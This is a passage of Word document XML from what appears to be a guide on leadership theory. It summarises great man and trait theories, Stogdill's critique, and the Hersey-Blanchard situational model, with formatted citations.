      <w:r w:rsidR="00171B13" w:rsidRPr="005D3C1A">
        <w:t xml:space="preserve"> from which the masses in his proximity profited</w:t>
      </w:r>
      <w:r w:rsidR="005543D0" w:rsidRPr="005D3C1A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="348303181"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="005543D0" w:rsidRPr="005D3C1A">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="007632AF">
            <w:instrText xml:space="preserve">CITATION Car41 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="005543D0" w:rsidRPr="005D3C1A">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="007632AF" w:rsidRPr="005C26DE">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Carlyle, 1841)</w:t>
          </w:r>
          <w:r w:rsidR="005543D0" w:rsidRPr="005D3C1A">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00646D8F">
        <w:t>, while</w:t>
      </w:r>
      <w:r w:rsidR="00EA2E33">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00685E23" w:rsidRPr="005D3C1A">
        <w:t>Galton stud</w:t>
      </w:r>
      <w:r w:rsidR="00646D8F">
        <w:t xml:space="preserve">ied </w:t>
      </w:r>
      <w:r w:rsidR="00685E23" w:rsidRPr="005D3C1A">
        <w:t>the hereditary background of great men</w:t>
      </w:r>
      <w:r w:rsidR="00646D8F">
        <w:t xml:space="preserve"> to determine</w:t>
      </w:r>
      <w:r w:rsidR="006713BF" w:rsidRPr="005D3C1A">
        <w:t xml:space="preserve"> ‘whether and in what degree natural ability was hereditarily transmitted</w:t>
      </w:r>
      <w:r w:rsidR="00646D8F">
        <w:t>’ t</w:t>
      </w:r>
      <w:r w:rsidR="008F0827" w:rsidRPr="005D3C1A">
        <w:t xml:space="preserve">o the extent that </w:t>
      </w:r>
      <w:r w:rsidR="00646D8F">
        <w:t>he</w:t>
      </w:r>
      <w:r w:rsidR="008F0827" w:rsidRPr="005D3C1A">
        <w:t xml:space="preserve"> was able to identify the probability of an eminent person having eminent relatives</w:t>
      </w:r>
      <w:r w:rsidR="006713BF" w:rsidRPr="005D3C1A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1994941625"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="006713BF" w:rsidRPr="005D3C1A">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="006713BF" w:rsidRPr="005D3C1A">
            <w:instrText xml:space="preserve">CITATION Gal69 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="006713BF" w:rsidRPr="005D3C1A">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00A732D5" w:rsidRPr="005D3C1A">
            <w:t>(Galton, 1869)</w:t>
          </w:r>
          <w:r w:rsidR="006713BF" w:rsidRPr="005D3C1A">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="008F0827" w:rsidRPr="005D3C1A">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="004F3020" w:rsidRPr="004F3020">
        <w:t xml:space="preserve">The lasting impact of </w:t>
      </w:r>
      <w:r w:rsidR="00EA44E3">
        <w:t xml:space="preserve">great man or </w:t>
      </w:r>
      <w:r w:rsidR="004F3020" w:rsidRPr="004F3020">
        <w:t xml:space="preserve">hero leadership </w:t>
      </w:r>
      <w:r w:rsidR="00EA44E3">
        <w:t>can still be observed over a century later</w:t>
      </w:r>
      <w:r w:rsidR="004F3020" w:rsidRPr="004F3020">
        <w:t>, where responsibility for having the answer to some of the world’s most complex problems are placed on the shoulders of individuals, such as</w:t>
      </w:r>
      <w:r w:rsidR="00EA44E3">
        <w:t xml:space="preserve"> presidents and prime </w:t>
      </w:r>
      <w:r w:rsidR="004F3020">
        <w:t>ministers and</w:t>
      </w:r>
      <w:r w:rsidR="004F3020" w:rsidRPr="004F3020">
        <w:t xml:space="preserve"> CEOs</w:t>
      </w:r>
      <w:r w:rsidR="004F3020">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007965C7" w:rsidRDefault="00492C9A" w:rsidP="005D3C1A">
      <w:r>
        <w:t>Subsequent to the ‘great man’ theorists, researchers</w:t>
      </w:r>
      <w:r w:rsidR="00D81A79">
        <w:t xml:space="preserve"> from the early to mid-twentieth century focussed on traits of personality and character to explain leadership</w:t>
      </w:r>
      <w:r w:rsidR="00EA44E3">
        <w:t xml:space="preserve"> and sought to identify those characteristics peculiar to leaders</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EA44E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D81A79">
        <w:t>Bird</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’s 1940 </w:t>
      </w:r>
      <w:r w:rsidR="00D81A79">
        <w:t>list of 79 relevant traits, taken from 20 psychologically oriented studies</w:t>
      </w:r>
      <w:r w:rsidR="006B225A">
        <w:t xml:space="preserve"> demonstrates the extent to which traits were considered quantifiable and predictable</w:t>
      </w:r>
      <w:r w:rsidR="00D81A79">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1360502790"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00D81A79">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00D81A79">
            <w:instrText xml:space="preserve"> CITATION Bas08 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="00D81A79">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D81A79" w:rsidRPr="00D81A79">
            <w:t>(Bass &amp; Bass, 2008)</w:t>
          </w:r>
          <w:r w:rsidR="00D81A79">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00D81A79">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00BB09AD">
        <w:t xml:space="preserve">Intelligence, drive, integrity and sociability </w:t>
      </w:r>
      <w:r w:rsidR="00076CA4">
        <w:t xml:space="preserve">were </w:t>
      </w:r>
      <w:r w:rsidR="00BB09AD">
        <w:t xml:space="preserve">central to the lists of almost all the researchers studying trait leadership </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1439358659"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00BB09AD">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00BB09AD">
            <w:instrText xml:space="preserve"> CITATION Kha13 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="00BB09AD">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00BB09AD" w:rsidRPr="00BB09AD">
            <w:t>(Khan, 2013)</w:t>
          </w:r>
          <w:r w:rsidR="00BB09AD">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00BB09AD">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B37E3E" w:rsidRPr="004464C0" w:rsidRDefault="00B37E3E" w:rsidP="004464C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="004464C0">
        <w:t>Criticisms and challenges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B20BFD" w:rsidRDefault="0084610E" w:rsidP="005A0D09">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>While ‘great man’ theories</w:t>
      </w:r>
      <w:r w:rsidR="00843AFD">
        <w:t xml:space="preserve"> were criticised</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00221443">
        <w:t>for their lack of scientific basis</w:t>
      </w:r>
      <w:r w:rsidR="000069AB">
        <w:t xml:space="preserve"> in</w:t>
      </w:r>
      <w:r w:rsidR="00843AFD">
        <w:t xml:space="preserve"> the nineteenth century</w:t>
      </w:r>
      <w:r>
        <w:t>, the</w:t>
      </w:r>
      <w:r w:rsidR="0016591B">
        <w:t xml:space="preserve"> examination of traits individually and in combination </w:t>
      </w:r>
      <w:r w:rsidR="000069AB">
        <w:t xml:space="preserve">did not fall </w:t>
      </w:r>
      <w:r w:rsidR="0016591B">
        <w:t>into</w:t>
      </w:r>
      <w:r w:rsidR="00C165D1">
        <w:t xml:space="preserve"> general</w:t>
      </w:r>
      <w:r w:rsidR="0016591B">
        <w:t xml:space="preserve"> disfavour </w:t>
      </w:r>
      <w:r w:rsidR="000069AB">
        <w:t xml:space="preserve">until </w:t>
      </w:r>
      <w:r w:rsidR="0016591B">
        <w:t xml:space="preserve">the middle of the twentieth century. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007861FC" w:rsidRPr="0016591B">
        <w:t>Stogdill</w:t>
      </w:r>
      <w:r w:rsidR="0016591B">
        <w:t>’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0016591B">
        <w:t xml:space="preserve"> 1948 critique </w:t>
      </w:r>
      <w:r w:rsidR="007861FC" w:rsidRPr="0016591B">
        <w:t>review</w:t>
      </w:r>
      <w:r w:rsidR="00BF1EF0">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="007861FC" w:rsidRPr="0016591B">
        <w:t xml:space="preserve"> 128 published studies </w:t>
      </w:r>
      <w:r w:rsidR="0016591B">
        <w:t xml:space="preserve">on </w:t>
      </w:r>
      <w:r w:rsidR="007861FC" w:rsidRPr="0016591B">
        <w:t>the traits and characteristics of leaders</w:t>
      </w:r>
      <w:r w:rsidR="00843AFD">
        <w:t xml:space="preserve"> contributed to this</w:t>
      </w:r>
      <w:r w:rsidR="000069AB">
        <w:t xml:space="preserve">. Paving the way for later researchers, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000069AB">
        <w:t>Stogdill</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00163727">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00843AFD">
        <w:t>conclud</w:t>
      </w:r>
      <w:r w:rsidR="000069AB">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00843AFD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006528C4">
        <w:t>that t</w:t>
      </w:r>
      <w:r w:rsidR="006528C4" w:rsidRPr="00C40E84">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">he qualities, characteristics, and skills required </w:t>
      </w:r>
      <w:r w:rsidR="000069AB">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="006528C4" w:rsidRPr="00C40E84">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> a leader are determined to a large extent by the demands of the situation</w:t>
      </w:r>
      <w:r w:rsidR="000069AB">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> and that</w:t>
      </w:r>
      <w:r w:rsidR="00CF3B55">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000069AB">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00CF3B55">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">an adequate analysis of leadership involves a study not only of leaders but also of situations’ </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
          </w:rPr>
          <w:id w:val="-199248111"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00CF3B55">
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00CF3B55">
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
            </w:rPr>
            <w:instrText xml:space="preserve">CITATION Bas08 \p 95 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="00CF3B55">
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00CF3B55" w:rsidRPr="0021790E">
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
            <w:t>(Bass &amp; Bass, 2008, p. 95)</w:t>
          </w:r>
          <w:r w:rsidR="00CF3B55">
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00CF3B55">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C40E84" w:rsidRDefault="00F22719" w:rsidP="005A0D09">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Stogd</w:t>
      </w:r>
      <w:r w:rsidR="0021790E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ill</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0021790E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006528C4">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="00CF3B55">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">touched on </w:t>
      </w:r>
      <w:r w:rsidR="006528C4">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">the relevance of followers </w:t>
      </w:r>
      <w:r w:rsidR="00CF3B55">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00E8335A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> a leader’s</w:t>
      </w:r>
      <w:r w:rsidR="00CF3B55">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> emergence and effectiveness, concluding that ‘a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> person does not become a leader by virtue of some combination of traits; but the patter</w:t>
      </w:r>
      <w:r w:rsidR="0016591B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> of personal characteristics of the leader must bear some relevant relationship to the characteristics, activities, and goals of the followers</w:t>
      </w:r>
      <w:r w:rsidR="00E8335A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00BE0FE1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="000069AB">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00BE0FE1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> connection between leaders and their followers would </w:t>
      </w:r>
      <w:r w:rsidR="000069AB">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="00BE0FE1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>form part of</w:t>
      </w:r>
      <w:r w:rsidR="0084610E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BE0FE1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>later</w:t>
      </w:r>
      <w:r w:rsidR="00586DE2">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> th</w:t>
      </w:r>
      <w:r w:rsidR="000069AB">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>inking</w:t>
      </w:r>
      <w:r w:rsidR="00586DE2">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BE0FE1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C3718" w:rsidRDefault="004C3718" w:rsidP="004464C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Further reading</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62211" w:rsidRDefault="00346518" w:rsidP="007D4C39">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
        <w:keepNext/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Thomas Carlyle</w:t>
      </w:r>
      <w:r w:rsidR="00D62211">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> (1841). </w:t>
      </w:r>
      <w:r w:rsidR="00D62211">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">On Heroes, Hero-worship, and the Heroic in History. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA44E3" w:rsidRDefault="00346518" w:rsidP="005C26DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">R M </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Stogdill</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001140DE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (1948).</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001140DE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘Personal factors associated with leadership: A survey of the literature’, </w:t>
      </w:r>
      <w:r w:rsidR="001140DE" w:rsidRPr="005C26DE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>The Journal of Psychology</w:t>
      </w:r>
      <w:r w:rsidR="001140DE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, 25: 35-71.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA44E3" w:rsidRDefault="00EA44E3" w:rsidP="007D4C39">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62211" w:rsidRDefault="00D62211" w:rsidP="005C26DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E86D6A" w:rsidRDefault="00E86D6A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc374536614"/>
      <w:r>
        <w:t>Situational leadership</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="004C3718" w:rsidRDefault="005F07FA" w:rsidP="005C26DE">
      <w:pPr>
        <w:pStyle w:val="APSCBulletedtext"/>
      </w:pPr>
      <w:r>
        <w:t>The Hersey-Blanchard situational leadership theory matches leadership style with employee experience.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C3718" w:rsidRDefault="005F07FA" w:rsidP="005C26DE">
      <w:pPr>
        <w:pStyle w:val="APSCBulletedtext"/>
      </w:pPr>
      <w:r>
        <w:t>The Vroom-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Yetton</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> contingency model recommends decision-making styles based on situational variables.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32AB1" w:rsidRDefault="001E37CE" w:rsidP="00ED681B">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="005F07FA">
        <w:t xml:space="preserve">he relationship between leaders and followers </w:t>
      </w:r>
      <w:r>
        <w:t>was</w:t>
      </w:r>
      <w:r w:rsidR="005F07FA">
        <w:t xml:space="preserve"> central to the situational leadership theories which emerged as trait theory fe</w:t>
      </w:r>
      <w:r w:rsidR="00C24565">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="005F07FA">
        <w:t>l into disfavour. The most prominent of the</w:t>
      </w:r>
      <w:r w:rsidR="006E6C70">
        <w:t>se</w:t>
      </w:r>
      <w:r w:rsidR="005F07FA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED681B">
        <w:t>are the Hersey-Blanchard situational leadership theory and the Vroom-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00ED681B">
        <w:t>Yetton</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00ED681B">
        <w:t xml:space="preserve"> contingency model of decision making. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00176102" w:rsidRDefault="002817E4" w:rsidP="002817E4">
      <w:r>
        <w:t xml:space="preserve">Hersey and Blanchard’s </w:t>
      </w:r>
      <w:r w:rsidR="005B5C26">
        <w:t>1969</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> life cycle theory of leadership (later renamed situational leadership theory)</w:t>
      </w:r>
      <w:r w:rsidR="00912F81">
        <w:t xml:space="preserve"> was based on </w:t>
      </w:r>
      <w:r w:rsidR="00A47586">
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r w:rsidR="00912F81">
        <w:t xml:space="preserve">interpretation </w:t>
      </w:r>
      <w:r w:rsidR="00D63635">
        <w:t xml:space="preserve">of existing </w:t>
      </w:r>
      <w:r w:rsidR="00912F81">
        <w:t>empirical research.</w:t>
      </w:r>
      <w:r w:rsidR="00D63635">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E6C70">
        <w:t>They propose</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that different leadership styles be employed depending on the situation</w:t>
      </w:r>
      <w:r w:rsidR="006E6C70">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as </w:t>
      </w:r>
      <w:r w:rsidR="00D868BD">
        <w:t xml:space="preserve">defined by </w:t>
      </w:r>
      <w:r>
        <w:t>both the orientation of the manager (either task or relations focussed) and the maturity (or experience) of the employee. In this model the most effective leadership match</w:t>
      </w:r>
      <w:r w:rsidR="00865083">
        <w:t>es</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the leader’s </w:t>
      </w:r>
      <w:r w:rsidR="00C24565">
        <w:t>orientation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with the subordinate’s maturity</w:t>
      </w:r>
      <w:r w:rsidR="00176102">
        <w:t>, beginning with ‘telling’ or directing newly appointed or less experienced employees in their tasks, to ‘selling’ or coaching employees with more experience</w:t>
      </w:r>
      <w:r w:rsidR="00A47586">
        <w:t xml:space="preserve">, through to </w:t>
      </w:r>
      <w:r w:rsidR="00176102">
        <w:t>‘participating’ or supporting</w:t>
      </w:r>
      <w:r w:rsidR="00A47586">
        <w:t xml:space="preserve">, where </w:t>
      </w:r>
      <w:r w:rsidR="00176102">
        <w:t xml:space="preserve">managers </w:t>
      </w:r>
      <w:r w:rsidR="00292454">
        <w:t>engag</w:t>
      </w:r>
      <w:r w:rsidR="00A47586">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00292454">
        <w:t xml:space="preserve"> employees’ maturity and knowledge to complete tasks. The final style</w:t>
      </w:r>
      <w:r w:rsidR="00A47586">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00292454">
        <w:t xml:space="preserve"> ‘delegating’</w:t>
      </w:r>
      <w:r w:rsidR="00A47586">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00292454">
        <w:t xml:space="preserve"> recognises that ‘fully mature subordinates work best when leaders delegate what needs to be done’ </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-682436459"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00292454">
            <w:instrText xml:space="preserve">CITATION Bas08 \p 517 \l 3081 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00292454" w:rsidRPr="007D4C39">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Bass &amp; Bass, 2008, p. 517)</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
